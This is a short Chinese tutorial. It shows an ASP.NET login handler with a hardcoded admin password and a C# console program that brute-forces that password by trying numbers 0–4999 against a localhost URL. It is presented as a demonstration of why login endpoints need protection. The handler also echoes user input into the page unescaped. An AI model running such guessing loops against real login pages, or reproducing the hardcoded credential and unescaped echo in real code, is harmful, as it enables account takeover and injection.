首先写出一段登陆程序:
//ashx端<%@ WebHandler Language="C#" Class="AddCalation" %>using System;using System.Web;public class AddCalation : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = "text/html"; string ispostback=context.Request["isback"]; string username = context.Request["username"]; string password = context.Request["password"]; if (ispostback == "yes") { if (username == "admin" && password == "2314") { context.Response.Write("登陆成功"); } else { context.Response.Write("登陆失败"); } } else { username = string.Empty; password = string.Empty; } string path = context.Server.MapPath("AddCalation.html"); string content = System.IO.File.ReadAllText(path); content=content.Replace("@user",username); content = content.Replace("@pass", password); context.Response.Write(content); } public bool IsReusable { get { return false; } }}//html端加法计算器
然后写一段C#控制台程序进行暴力破解
1 using System; 2 using System.Collections.Generic; 3 using System.Linq; 4 using System.Net; 5 using System.Text; 6 using System.Threading.Tasks; 7 8 9 namespace PasswordBreak10 {11 class Program12 {13 static void Main(string[] args)14 {15 WebClient wc = new WebClient();16 wc.Encoding = Encoding.UTF8;17 string s="";18 for (int i = 0; i < 5000; i++)19 {20 s = wc.DownloadString("http://localhost:41566/AddCalation.ashx?isback=yes&username=admin&password=" + i);21 if (s.Contains("登陆成功"))22 { Console.WriteLine(i); break; }23 }24 Console.WriteLine();25 Console.Write(s);26 Console.ReadKey();27 }28 }29 }
通过循环依次试验密码来破解自己写的登陆代码中的密码
所以说登陆端口的安全性非常重要。